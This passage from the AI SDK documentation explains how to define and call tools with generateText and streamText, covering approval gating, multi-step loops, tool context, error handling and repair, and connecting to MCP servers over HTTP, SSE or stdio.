location: z.string().describe('The location to get the weather for'),
}),
inputExamples: [
{ input: { location: 'San Francisco' } },
{ input: { location: 'London' } },
],
execute: async ({ location }) => {
// ...
},
});
Tool Execution Approval
By default, tools with an execute function run automatically as the model calls them. You can require approval before execution in two ways:
- Set `needsApproval` on an individual tool to define its default approval behavior
- Set `toolNeedsApproval` on `generateText` or `streamText` to configure approval for specific tools at call time
Use needsApproval when the tool should usually require approval wherever it is used. Use toolNeedsApproval when approval depends on the specific request or runtime context. If both are provided, toolNeedsApproval takes precedence.
Tool-Level Approval with needsApproval
import { tool } from 'ai';
import { z } from 'zod';
const runCommand = tool({
description: 'Run a shell command',
inputSchema: z.object({
command: z.string().describe('The shell command to execute'),
}),
needsApproval: true,
execute: async ({ command }) => {
// your command execution logic here
},
});
Call-Level Approval with toolNeedsApproval
const result = await generateText({
model: __MODEL__,
tools: { runCommand },
toolNeedsApproval: {
runCommand: true,
},
prompt: 'Remove the most recent file in the downloads folder',
});
toolNeedsApproval can also be a function per tool, which lets you decide dynamically based on the tool input and runtime options such as toolCallId, messages, and context.
This is useful for tools that perform sensitive operations like executing commands, processing payments, modifying data, and more potentially dangerous actions.
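A sketch of the function form, assuming (as with the needsApproval example below) that the function receives the tool input as its first argument:
const result = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  toolNeedsApproval: {
    // hypothetical policy: only deletion commands need approval
    runCommand: async ({ command }) => command.includes('rm'),
  },
  prompt: 'Tidy up the downloads folder',
});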
How It Works
When a tool requires approval, generateText and streamText don't pause execution. Instead, they complete and return tool-approval-request parts in the result content. This means the approval flow requires two calls to the model: the first returns the approval request, and the second (after receiving the approval response) either executes the tool or informs the model that approval was denied.
The approval requirement can come from either tool-level needsApproval or call-level toolNeedsApproval.
Here's the complete flow:
- Call generateText or streamText with approval configured via needsApproval or toolNeedsApproval
- The model generates a tool call
- The call returns tool-approval-request parts in result.content
- Your app requests approval and collects the user's decision
- Add a tool-approval-response to the messages array
- Call generateText or streamText again with the updated messages
- If approved, the tool runs and returns a result. If denied, the model sees the denial and responds accordingly.
Handling Approval Requests
After calling generateText or streamText, check result.content for tool-approval-request parts:
import { type ModelMessage, generateText } from 'ai';
const messages: ModelMessage[] = [
{ role: 'user', content: 'Remove the most recent file' },
];
const result = await generateText({
model: __MODEL__,
tools: { runCommand },
messages,
});
messages.push(...result.response.messages);
for (const part of result.content) {
if (part.type === 'tool-approval-request') {
console.log(part.approvalId); // Unique ID for this approval request
console.log(part.toolCall); // Contains toolName, input, etc.
}
}
To respond, create a tool-approval-response and add it to your messages:
import { type ToolApprovalResponse } from 'ai';
const approvals: ToolApprovalResponse[] = [];
for (const part of result.content) {
if (part.type === 'tool-approval-request') {
const response: ToolApprovalResponse = {
type: 'tool-approval-response',
approvalId: part.approvalId,
approved: true, // or false to deny
reason: 'User confirmed the command', // Optional context for the model
};
approvals.push(response);
}
}
// add approvals to messages
messages.push({ role: 'tool', content: approvals });
Then call generateText or streamText again with the updated messages. If approved, the tool executes. If denied, the model receives the denial and can respond accordingly.
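Here is a minimal sketch of that second call, continuing the runCommand example above (the finalResult name is illustrative):
const finalResult = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  // the message history now contains the approval responses,
  // so the SDK runs the approved tool and continues the generation
  messages,
});

console.log(finalResult.text);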
Dynamic Approval
You can make approval decisions based on tool input by providing an async function:
const paymentTool = tool({
description: 'Process a payment',
inputSchema: z.object({
amount: z.number(),
recipient: z.string(),
}),
needsApproval: async ({ amount }) => amount > 1000,
execute: async ({ amount, recipient }) => {
return await processPayment(amount, recipient);
},
});
In this example, only transactions over $1000 require approval. Smaller transactions execute automatically.
You can use the same function shape in toolNeedsApproval when you want that decision to be defined at call time instead of on the tool itself.
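For example, a sketch that applies the same input-based check at call time, reusing the runCommand tool from above (the exact condition is illustrative):
const result = await generateText({
  model: __MODEL__,
  tools: { runCommand },
  toolNeedsApproval: {
    // same function shape as needsApproval: decide based on the tool input
    runCommand: async ({ command }) => command.includes('rm'),
  },
  prompt: 'Clean up the downloads folder',
});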
Tool Execution Approval with useChat
When using useChat, the approval flow is handled through UI state. See Chatbot Tool Usage for details on handling approvals in your UI with addToolApprovalResponse.
Multi-Step Calls (using stopWhen)
With the stopWhen setting, you can enable multi-step calls in generateText and streamText. When stopWhen is set and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there are no further tool calls or the stopping condition is met.
The AI SDK provides several built-in stopping conditions:
- stepCountIs(count): stops after a specified number of steps (default: stepCountIs(20))
- hasToolCall(...toolNames): stops when any of the specified tools is called
- isLoopFinished(): never triggers, letting the loop run until naturally finished
You can also combine multiple conditions in an array or create custom conditions. See Loop Control for more details.
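For example, a minimal sketch combining two conditions in an array (the submitAnswer tool name is hypothetical):
import { generateText, stepCountIs, hasToolCall } from 'ai';

const result = await generateText({
  model: __MODEL__,
  tools: {
    // ... your tools, including a (hypothetical) submitAnswer tool
  },
  // stop when either condition is met: 10 steps or a submitAnswer call
  stopWhen: [stepCountIs(10), hasToolCall('submitAnswer')],
  prompt: '...',
});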
By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.
You may want the model to generate text after the tool has been executed, e.g. to summarize the tool results in the context of the user's query. In many cases, you may also want the model to use multiple tools in a single response. This is where multi-step calls come in.
You can think of multi-step calls as similar to a conversation with a human. When you ask a question that the person cannot answer from their general knowledge (a model's training data), they may need to look up information (use a tool) before they can answer. In the same way, the model may need to call a tool to get the information it needs to answer your question, where each generation (tool call or text generation) is a step.
Example
In the following example, there are two steps:
- Step 1
  - The prompt 'What is the weather in San Francisco?' is sent to the model.
  - The model generates a tool call.
  - The tool call is executed.
- Step 2
  - The tool result is sent to the model.
  - The model generates a response considering the tool result.
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const { text, steps } = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // stop after a maximum of 5 steps if tools were called
prompt: 'What is the weather in San Francisco?',
});
You can use streamText in a similar way.
Steps
To access intermediate tool calls and results, you can use the steps property in the result object
or the streamText onFinish callback.
It contains all the text, tool calls, tool results, and more from each step.
Example: Extract tool results from all steps
import { generateText, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const { steps } = await generateText({
model: __MODEL__,
stopWhen: stepCountIs(10),
// ...
});
// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);
onStepFinish callback
When using generateText or streamText, you can provide an onStepFinish callback that
is triggered when a step is finished,
i.e. all text deltas, tool calls, and tool results for the step are available.
When you have multiple steps, the callback is triggered for each step.
The callback receives a stepNumber (zero-based) to identify which step just completed:
import { generateText } from 'ai';
const result = await generateText({
// ...
onStepFinish({
stepNumber,
text,
toolCalls,
toolResults,
finishReason,
usage,
}) {
console.log(`Step ${stepNumber} finished (${finishReason})`);
// your own logic, e.g. for saving the chat history or recording usage
},
});
Tool execution lifecycle callbacks
You can use experimental_onToolExecutionStart and experimental_onToolExecutionEnd to observe tool execution.
These callbacks are called right before and after each tool's execute function, giving you
visibility into tool execution timing, inputs, outputs, and errors:
import { generateText } from 'ai';
const result = await generateText({
// ... model, tools, prompt
experimental_onToolExecutionStart({ toolName, toolCallId, input }) {
console.log(`Calling tool: ${toolName}`, { toolCallId, input });
},
experimental_onToolExecutionEnd({
toolName,
toolCallId,
output,
error,
durationMs,
}) {
if (error) {
console.error(`Tool ${toolName} failed after ${durationMs}ms:`, error);
} else {
console.log(`Tool ${toolName} completed in ${durationMs}ms`, { output });
}
},
});
Errors thrown inside these callbacks are silently caught and do not break the generation flow.
prepareStep callback
The prepareStep callback is called before a step is started.
It is called with the following parameters:
- model: The model that was passed into generateText.
- stopWhen: The stopping condition that was passed into generateText.
- stepNumber: The number of the step that is being executed.
- steps: The steps that have been executed so far.
- messages: The messages that will be sent to the model for the current step.
- runtimeContext: The runtime context passed via the runtimeContext setting.
- toolsContext: The per-tool context map passed via the toolsContext setting.
You can use it to provide different settings for a step, including modifying the input messages.
import { generateText } from 'ai';
const result = await generateText({
// ...
prepareStep: async ({ model, stepNumber, steps, messages }) => {
if (stepNumber === 0) {
return {
// use a different model for this step:
model: modelForThisParticularStep,
// force a tool choice for this step:
toolChoice: { type: 'tool', toolName: 'tool1' },
// limit the tools that are available for this step:
activeTools: ['tool1'],
};
}
// when nothing is returned, the default settings are used
},
});
Message Modification for Longer Agentic Loops
In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:
prepareStep: async ({ stepNumber, steps, messages }) => {
// Compress conversation history for longer loops
if (messages.length > 20) {
return {
messages: messages.slice(-10),
};
}
return {};
},
Provider Options for Step Configuration
You can use providerOptions in prepareStep to pass provider-specific configuration for each step. This is useful for features like Anthropic's code execution container persistence:
import { forwardAnthropicContainerIdFromLastStep } from '@ai-sdk/anthropic';
// Propagate container ID from previous step for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,
Response Messages
Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.
Both generateText and streamText have a response.messages property that you can use to
add the assistant and tool messages to your conversation history.
It is also available in the onFinish callback of streamText.
The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:
import { generateText, ModelMessage } from 'ai';
const messages: ModelMessage[] = [
// ...
];
const { response } = await generateText({
// ...
messages,
});
// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)
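For streamText, a sketch of the same bookkeeping in the onFinish callback:
const result = streamText({
  // ...
  messages,
  onFinish: ({ response }) => {
    // add the assistant and tool messages to your conversation history
    messages.push(...response.messages);
  },
});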
Dynamic Tools
AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions at runtime
- Tools loaded from external sources
Using dynamicTool
The dynamicTool helper creates tools with unknown input/output types:
import { dynamicTool } from 'ai';
import { z } from 'zod';
const customTool = dynamicTool({
description: 'Execute a custom function',
inputSchema: z.object({}),
execute: async input => {
// input is typed as 'unknown'
// You need to validate/cast it at runtime
const { action, parameters } = input as any;
// Execute your dynamic logic
return { result: `Executed ${action}` };
},
});
Type-Safe Handling
When using both static and dynamic tools, use the dynamic flag for type narrowing:
const result = await generateText({
model: __MODEL__,
tools: {
// Static tool with known types
weather: weatherTool,
// Dynamic tool
custom: dynamicTool({
/* ... */
}),
},
onStepFinish: ({ toolCalls, toolResults }) => {
// Type-safe iteration
for (const toolCall of toolCalls) {
if (toolCall.dynamic) {
// Dynamic tool: input is 'unknown'
console.log('Dynamic:', toolCall.toolName, toolCall.input);
continue;
}
// Static tool: full type inference
switch (toolCall.toolName) {
case 'weather':
console.log(toolCall.input.location); // typed as string
break;
}
}
},
});
Preliminary Tool Results
You can return an AsyncIterable over multiple results.
In this case, the last value from the iterable is the final tool result.
This can be used in combination with generator functions to e.g. stream status information during the tool execution:
tool({
description: 'Get the current weather.',
inputSchema: z.object({
location: z.string(),
}),
async *execute({ location }) {
yield {
status: 'loading' as const,
text: `Getting weather for ${location}`,
weather: undefined,
};
await new Promise(resolve => setTimeout(resolve, 3000));
const temperature = 72 + Math.floor(Math.random() * 21) - 10;
yield {
status: 'success' as const,
text: `The weather in ${location} is ${temperature}°F`,
temperature,
};
},
});
Tool Choice
You can use the toolChoice setting to influence when a tool is selected.
It supports the following settings:
- auto (default): the model can choose whether and which tools to call.
- required: the model must call a tool. It can choose which tool to call.
- none: the model must not call tools.
- { type: 'tool', toolName: string (typed) }: the model must call the specified tool.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
toolChoice: 'required', // force the model to call a tool
prompt: 'What is the weather in San Francisco?',
});
Tool Execution Options
When tools are called, they receive additional options as a second parameter.
Tool Call ID
The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.
import {
streamText,
tool,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream({
execute: ({ writer }) => {
const result = streamText({
// ...
messages,
tools: {
myTool: tool({
// ...
execute: async (args, { toolCallId }) => {
// return e.g. custom status for tool call
writer.write({
type: 'data-tool-status',
id: toolCallId,
data: {
name: 'myTool',
status: 'in-progress',
},
});
// ...
},
}),
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Messages
The messages that were sent to the language model to initiate the response that contained the tool call are forwarded to the tool execution.
You can access them in the second parameter of the execute function.
In multi-step calls, the messages contain the text, tool calls, and tool results from all previous steps.
import { generateText, tool } from 'ai';
const result = await generateText({
// ...
tools: {
myTool: tool({
// ...
execute: async (args, { messages }) => {
// use the message history in e.g. calls to other language models
return { /* ... */ };
},
}),
},
});
Abort Signals
The abort signals from generateText and streamText are forwarded to the tool execution.
You can access them in the second parameter of the execute function and e.g. abort long-running computations or forward them to fetch calls inside tools.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
abortSignal: myAbortSignal, // signal that will be forwarded to tools
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }, { abortSignal }) => {
return fetch(
`https://api.weatherapi.com/v1/current.json?q=${location}`,
{ signal: abortSignal }, // forward the abort signal to fetch
);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Runtime Context
You can pass in arbitrary runtime context from generateText or streamText via the runtimeContext setting.
This runtime context is available in prepareStep.
To avoid confusion with prompt context or retrieved context, the docs refer to this feature as runtime context.
This is useful for values like tenant information, feature flags, session data, or other server-side state that should influence step preparation without being embedded into the prompt.
Tool execution context is now separate. If a tool needs server-side values such as API keys, pass them via toolsContext, keyed by tool name. Each tool then receives only its own typed context value based on its contextSchema.
At a high level:
- Pass shared step-level state through runtimeContext
- Read or update it in prepareStep
- Pass per-tool values through toolsContext
- Declare each tool's expected tool context with contextSchema
- Access the tool's typed context in execute together with other execution metadata such as toolCallId, messages, and abortSignal
import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';
const result = streamText({
model: openai('gpt-5-mini'),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
contextSchema: z.object({
weatherApiKey: z.string().describe('The API key for the weather API'),
}),
execute: async (
{ location },
{ toolCallId, messages, abortSignal, context },
) => {
const { weatherApiKey } = context;
console.log('tool call:', toolCallId);
console.log('messages available to tool:', messages.length);
console.log('abortable:', abortSignal != null);
console.log('weather tool api key:', weatherApiKey);
return {
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
};
},
}),
},
runtimeContext: {
somethingElse: 'other-context',
},
toolsContext: {
weather: {
weatherApiKey: 'weather-123',
},
},
prepareStep: async ({ runtimeContext, toolsContext }) => {
console.log('prepareStep runtimeContext:', runtimeContext);
console.log('prepareStep toolsContext:', toolsContext);
return {
// You can keep the runtimeContext unchanged or return a new one
// to affect the current and subsequent steps.
runtimeContext,
};
},
prompt: 'What is the weather in San Francisco?',
});
In this example, prepareStep receives the full runtime context object:
{
somethingElse: string;
}
prepareStep also receives the per-tool toolsContext map:
{
weather: {
weatherApiKey: string;
};
}
The weather tool then receives only its own typed context based on its contextSchema. In this case, execute can access weatherApiKey, while the shared step-level runtimeContext remains separate.
Tool Input Lifecycle Hooks
The following tool input lifecycle hooks are available:
- onInputStart: Called when the model starts generating the input (arguments) for the tool call
- onInputDelta: Called for each chunk of text as the input is streamed
- onInputAvailable: Called when the complete input is available and validated
onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.
Example
import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
onInputStart: () => {
console.log('Tool call starting');
},
onInputDelta: ({ inputTextDelta }) => {
console.log('Received input chunk:', inputTextDelta);
},
onInputAvailable: ({ input }) => {
console.log('Complete input:', input);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Types
Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.
You can use them to strongly type your variables, function parameters, and return types
in parts of the code that are not directly related to streamText or generateText.
Each tool call is typed with ToolCall<NAME extends string, ARGS>, depending
on the tool that has been invoked.
Similarly, the tool results are typed with ToolResult<NAME extends string, ARGS, RESULT>.
The tools in streamText and generateText are defined as a ToolSet.
The type inference helpers TypedToolCall<TOOLS extends ToolSet>
and TypedToolResult<TOOLS extends ToolSet> can be used to
extract the tool call and tool result types from the tools.
import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const myToolSet = {
firstTool: tool({
description: 'Greets the user',
inputSchema: z.object({ name: z.string() }),
execute: async ({ name }) => `Hello, ${name}!`,
}),
secondTool: tool({
description: 'Tells the user their age',
inputSchema: z.object({ age: z.number() }),
execute: async ({ age }) => `You are ${age} years old!`,
}),
};
type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;
async function generateSomething(prompt: string): Promise<{
text: string;
toolCalls: Array<MyToolCall>; // typed tool calls
toolResults: Array<MyToolResult>; // typed tool results
}> {
return generateText({
model: __MODEL__,
tools: myToolSet,
prompt,
});
}
Handling Errors
The AI SDK has three tool-call related errors:
- NoSuchToolError: the model tries to call a tool that is not defined in the tools object
- InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
- ToolCallRepairError: an error that occurred during tool call repair
When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.
generateText
generateText throws errors for tool schema validation issues and other errors; these can be handled with a try/catch block. Tool execution errors appear as tool-error parts in the result steps:
try {
const result = await generateText({
//...
});
} catch (error) {
if (NoSuchToolError.isInstance(error)) {
// handle the no such tool error
} else if (InvalidToolInputError.isInstance(error)) {
// handle the invalid tool inputs error
} else {
// handle other errors
}
}
Tool execution errors are available in the result steps:
const { steps } = await generateText({
// ...
});
// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
step.content.filter(part => part.type === 'tool-error'),
);
toolErrors.forEach(toolError => {
console.log('Tool error:', toolError.error);
console.log('Tool name:', toolError.toolName);
console.log('Tool input:', toolError.input);
});
streamText
streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.
When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: error => {
if (NoSuchToolError.isInstance(error)) {
return 'The model tried to call an unknown tool.';
} else if (InvalidToolInputError.isInstance(error)) {
return 'The model called a tool with invalid inputs.';
} else {
return 'An unknown error occurred.';
}
},
});
Tool Call Repair
Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.
If you use multiple steps, those failed tool calls will be sent back to the LLM in the next step to give it an opportunity to fix them. However, you may want to control how invalid tool calls are repaired without requiring additional steps that pollute the message history.
You can use the experimental_repairToolCall function to attempt to repair the tool call
with a custom function.
You can use different strategies to repair the tool call:
- Use a model with structured outputs to generate the inputs.
- Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
- Provide more specific repair instructions based on which tool was called.
Example: Use a model with structured outputs for repair
import { generateText, NoSuchToolError, Output } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
inputSchema,
error,
}) => {
if (NoSuchToolError.isInstance(error)) {
return null; // do not attempt to fix invalid tool names
}
const tool = tools[toolCall.toolName as keyof typeof tools];
const { output: repairedArgs } = await generateText({
model: __MODEL__,
output: Output.object({ schema: tool.inputSchema }),
prompt: [
`The model tried to call the tool "${toolCall.toolName}"` +
` with the following inputs:`,
JSON.stringify(toolCall.input),
`The tool accepts the following schema:`,
JSON.stringify(inputSchema(toolCall)),
'Please fix the inputs.',
].join('\n'),
});
return { ...toolCall, input: JSON.stringify(repairedArgs) };
},
});
Example: Use the re-ask strategy for repair
import { generateText, NoSuchToolError } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
error,
messages,
system,
}) => {
const result = await generateText({
model,
system,
messages: [
...messages,
{
role: 'assistant',
content: [
{
type: 'tool-call',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: toolCall.input,
},
],
},
{
role: 'tool' as const,
content: [
{
type: 'tool-result',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
output: error.message,
},
],
},
],
tools,
});
const newToolCall = result.toolCalls.find(
newToolCall => newToolCall.toolName === toolCall.toolName,
);
return newToolCall != null
? {
type: 'tool-call' as const,
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: JSON.stringify(newToolCall.input),
}
: null;
},
});
Active Tools
Language models can only handle a limited number of tools at a time, depending on the model.
To allow for static typing over a large set of tools while limiting the tools available to the model at the same time,
the AI SDK provides the activeTools property.
It is an array of tool names that are currently active.
By default, the value is undefined and all tools are active.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
tools: myToolSet,
activeTools: ['firstTool'],
});
Multi-modal Tool Results
For Google, use base64 media parts (file-data) or base64
data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts
are not supported.
In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.
AI SDK Core tools have an optional toModelOutput function
that converts the tool result into a content part.
Here is an example for converting a screenshot into a content part:
import fs from 'node:fs';
import { generateText } from 'ai';
import { anthropic } from '@ai-sdk/anthropic';

const result = await generateText({
model: __MODEL__,
tools: {
computer: anthropic.tools.computer_20241022({
// ...
async execute({ action, coordinate, text }) {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return {
type: 'content',
value:
typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'media', data: output.data, mediaType: 'image/png' }],
};
},
}),
},
// ...
});
Extracting Tools
Once you start having many tools, you might want to extract them into separate files.
The tool helper function is crucial for this, because it ensures correct type inference.
Here is an example of an extracted tool:
import { tool } from 'ai';
import { z } from 'zod';
// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
});
MCP Tools
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. MCP enables your AI applications to discover and use tools across various services through a standardized interface.
For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.
AI SDK Tools vs MCP Tools
In most cases, you should define your own AI SDK tools for production applications. They provide full control, type safety, and optimal performance. MCP tools are best suited for rapid development iteration and scenarios where users bring their own tools.
| Aspect | AI SDK Tools | MCP Tools |
|---|---|---|
| Type Safety | Full static typing end-to-end | Dynamic discovery at runtime |
| Execution | Same process as your request (low latency) | Separate server (network overhead) |
| Prompt Control | Full control over descriptions and schemas | Controlled by MCP server owner |
| Schema Control | You define and optimize for your model | Controlled by MCP server owner |
| Version Management | Full visibility over updates | Can update independently (version skew risk) |
| Authentication | Same process, no additional auth required | Separate server introduces additional auth complexity |
| Best For | Production applications requiring control and performance | Development iteration, user-provided tools |
Examples
You can see tools in action using various frameworks in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use tools in Node.js', link: '/cookbook/node/call-tools', }, { title: 'Learn to use tools in Next.js with Route Handlers', link: '/cookbook/next/call-tools', }, { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, ]} />
title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.
Model Context Protocol (MCP)
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools, resources, and prompts. This enables your AI applications to discover and use capabilities across various services through a standardized interface.
Initializing an MCP Client
We recommend using HTTP transport (like StreamableHTTPClientTransport) for production deployments. The stdio transport should only be used for connecting to local servers as it cannot be deployed to production environments.
Create an MCP client using one of the following transport options:
- HTTP transport (Recommended): Either configure HTTP directly via the client using transport: { type: 'http', ... }, or use MCP's official TypeScript SDK StreamableHTTPClientTransport
- SSE (Server-Sent Events): An alternative HTTP-based transport
- stdio: For local development only. Uses standard input/output streams for local MCP servers
HTTP Transport (Recommended)
For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:
import { createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'http',
url: 'https://your-server.com/mcp',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
// optional: allow redirect responses (default is 'error' to prevent SSRF)
redirect: 'follow',
},
});
Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:
import { createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';
const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
transport: new StreamableHTTPClientTransport(url, {
sessionId: 'session_123',
}),
});
SSE Transport
SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:
import { createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://my-server.com/sse',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
// optional: allow redirect responses (default is 'error' to prevent SSRF)
redirect: 'follow',
},
});
Stdio Transport (Local Servers)
The Stdio transport can be imported from either the MCP SDK or the AI SDK:
import { createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';
const mcpClient = await createMCPClient({
transport: new StdioClientTransport({
command: 'node',
args: ['src/stdio/dist/server.js'],
}),
});
Custom Transport
You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.
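At a high level, a transport manages the connection lifecycle and forwards JSON-RPC messages. The following skeleton is a hypothetical sketch only; the member names follow the general MCP transport contract (start, send, close, plus onmessage/onerror/onclose callbacks), and you should verify them against the MCPTransport type definition:
import { createMCPClient } from '@ai-sdk/mcp';

class MyCustomTransport {
  // callbacks that the MCP client assigns; invoke them from your connection logic
  onmessage?: (message: unknown) => void;
  onerror?: (error: Error) => void;
  onclose?: () => void;

  async start() {
    // open your connection and wire incoming messages to this.onmessage
  }

  async send(message: unknown) {
    // serialize and deliver the JSON-RPC message to the server
  }

  async close() {
    // tear down the connection and invoke this.onclose
  }
}

const mcpClient = await createMCPClient({
  // cast for this sketch; implement the MCPTransport interface properly in real code
  transport: new MyCustomTransport() as any,
});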
Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE
transports by providing an authProvider.
Closing the MCP Client
After initialization, you should close the MCP client based on your usage pattern:
- For short-lived usage (e.g., single requests), close the client when the response is finished
- For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates
When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:
import { createMCPClient } from '@ai-sdk/mcp';
import { streamText } from 'ai';

const mcpClient = await createMCPClient({
// ...
});
const tools = await mcpClient.tools();
const result = streamText({
model: __MODEL__,
tools,
prompt: 'What is the weather in Brooklyn, New York?',
onFinish: async () => {
await mcpClient.close();
},
});
When generating responses without streaming, you can use try/finally or cleanup functions in your framework:
import { createMCPClient, type MCPClient } from '@ai-sdk/mcp';
let mcpClient: MCPClient | undefined;
try {
mcpClient = await createMCPClient({
// ...
});
} finally {
await mcpClient?.close();
}
Using MCP Tools
The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:
Schema Discovery
With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:
const tools = await mcpClient.tools();
This approach is simpler to implement and automatically stays in sync with server changes. However, you won't have TypeScript type safety during development, and all tools from the server will be loaded.
Schema Definition
For better type safety and control, you can define the tools and their input schemas explicitly in your client code:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-data': {
inputSchema: z.object({
query: z.string().describe('The data query'),
format: z.enum(['json', 'text']).optional(),
}),
},
// For tools with zero inputs, you should use an empty object:
'tool-with-no-args': {
inputSchema: z.object({}),
},
},
});
This approach provides full TypeScript type safety and IDE autocompletion, letting you catch parameter mismatches during development. When you define schemas, the client only pulls the explicitly defined tools, keeping your application focused on the tools it needs.
Typed Tool Outputs
